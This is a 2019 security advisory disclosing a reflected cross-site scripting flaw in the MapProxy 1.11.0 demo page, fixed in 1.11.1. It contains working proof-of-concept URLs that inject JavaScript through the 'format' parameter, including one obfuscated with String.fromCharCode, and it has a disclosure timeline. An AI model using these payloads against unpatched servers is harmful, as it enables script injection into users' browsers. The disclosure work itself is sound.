MapProxy 1.11.0 Cross Site Scripting

`  
[waraxe-2019-SA#110] - Reflected XSS in MapProxy 1.11.0  
================================================================================  
  
Author: Janek Vind "waraxe"  
Date: 07. August 2019  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-110.html  
  
Target description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
MapProxy is an open source proxy for geospatial data. It caches, accelerates and  
transforms data from existing map services and serves any desktop or web GIS client.  
  
https://mapproxy.org/  
  
Vulnerable version: 1.11.0  
Fixed version: 1.11.1  
  
###############################################################################  
1. Reflected XSS in demo service  
###############################################################################  
  
Reason:  
* Insufficient sanitization of user-supplied data  
Attack vector:  
* User-supplied GET parameter "format"  
  
Testing for Reflected XSS:  
  
https://valid.host/demo/?wmts_layer=valid_layer&format=png"foo'bar&srs=valid_srs  
  
Hostname, "wmts_layer" and "srs" must be valid.  
Let's look at the HTML source:  
  
------------------------[ source code start ]----------------------------------  
  
<input type="hidden" name="format" value="png"foo'bar">  
  
------------------------[ source code end ]------------------------------------  
  
We can see that double quote character from GET parameter "format" is not sanitized  
by MapProxy and this allows us to "break out" from HTML input element.  
Unfortunately for attacker it's hidden input element and this kind of XSS issues  
are hard to exploit:  
  
https://portswigger.net/blog/xss-in-hidden-input-fields  
  
But it appears that there is one more injection point:  
  
------------------------[ source code start ]----------------------------------  
var layer = new OpenLayers.Layer.WMTS({  
name: "valid_layer",  
url: '../wmts/valid_layer/{TileMatrixSet}/{TileMatrix}/{TileCol}/{TileRow}.png',  
layer: 'valid_layer',  
matrixSet: 'GMC',  
format: 'png"foo'bar', <--- Injection point  
isBaseLayer: true,  
style: 'default',  
requestEncoding: 'REST'  
});  
------------------------[ source code end ]------------------------------------  
  
As seen above, MapProxy fails to sanitize single quotes too and this allows us  
direct JavaScript injection.  
  
Working XSS PoC:  
  
https://valid.host/demo/?wmts_layer=valid_layer&format=png'-alert('XSS')-'&srs=valid_srs  
  
It's worth to mention that XSS payload length is probably limited only with URL  
max length and test with 1000 byte long payload was successful.  
One more thing - Chrome web browser has built-in XSS countermeasures, but this exploit  
works even with Chrome.  
  
And of course it's possible to use more sophisticated XSS payloads:  
  
https://valid.host/mapproxy/demo/?wmts_layer=valid_layer&  
format=png'-eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))-'&srs=valid_srs  
  
Disclosure timeline:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
12.07.2019 -> First email sent to developers  
12.07.2019 -> Got first response from developers  
12.07.2019 -> Sending detailed information to developers  
06.08.2019 -> Found problems are fixed, new version available  
07.08.2019 -> Waraxe advisory released  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[email protected]  
Janek Vind "waraxe"  
  
Waraxe forum: http://www.waraxe.us/  
Personal homepage: http://www.janekvind.com/  
`